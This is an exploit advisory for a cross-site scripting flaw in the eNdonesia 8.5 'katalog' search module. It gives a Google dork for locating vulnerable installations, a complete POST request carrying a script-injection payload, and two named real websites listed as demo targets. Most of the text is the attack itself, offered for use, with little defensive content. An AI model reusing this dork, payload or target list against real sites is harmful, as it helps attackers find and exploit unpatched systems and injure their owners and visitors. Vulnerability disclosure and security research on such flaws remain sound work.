eNdonesia katalog module version 8.5 suffers from a cross site scripting vulnerability.
aa87de6d3861fc8e0e457c276446c4b1de520503f1eaac7f766e6852cb512158
# Exploit Title: eNdonesia katalog Module Cross Site Scripting
# Google Dork: inurl:mod.php?mod=katalog&op=
# Date: 07/28/2012
# Author: Crim3R
# download Link :
http://nchc.dl.sourceforge.net/project/endonesia/eNdonesia/eNdonesia.8.5/endonesia.8.5.zip
# Version: 8.5
# Tested on: all
===============[Vuln Codes]=============
POST DATA :
POST /mod.php?mod=katalog&op=search HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=bd754cf29d75a9a9a2854bce167b7a3b
Host: www.Vuln-target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
query=<script>alert(0);</script>
D3MO:
http://www.mimbar-opini.com/mod.php?mod=katalog&op=search
http://www.planethijau.com/mod.php?mod=katalog&op=search
===============Crim3R@Att.Net===========
$home = http://Secure-Land.net
thanks to : 2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini
and all Secure-land Members ...